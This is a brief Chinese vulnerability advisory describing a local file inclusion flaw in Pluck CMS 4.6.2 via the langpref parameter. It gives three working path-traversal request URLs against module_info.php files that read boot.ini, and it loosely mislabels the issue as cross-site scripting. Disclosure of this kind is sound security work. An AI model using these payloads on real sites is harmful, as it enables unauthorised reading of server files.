Pluck langpref参数本地文件包含漏洞

影响版本:
somp Pluck CMS 4.6.2

程序介绍:

pluck是用php编写的简单内容管理系统。

漏洞分析:

pluck的data/modules/contactform/module_info.php、data/modules/blog /module_info.php和data/modules/albums/module_info.php模块没有过滤对langpref参数所传送的输入便用于保护文件,远程攻击者可以通过跨站脚本攻击包含本地资源的任意文件。成功利用这个漏洞要求打开了register_globals。

漏洞利用:

path/data/modules/contactform/module_info.php?langpref=../../../../../boot.ini
path/data/modules/blog/module_info.php?langpref=../../../../../boot.ini
path/data/modules/albums/module_info.php?langpref=../../../../../boot.ini

解决方案:
厂商补丁:
somp
—-
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.pluck-cms.org/

信息来源:
<*来源:ahmadbady
链接:http://secunia.com/advisories/35145/
*>

发表评论?

0 条评论。

发表评论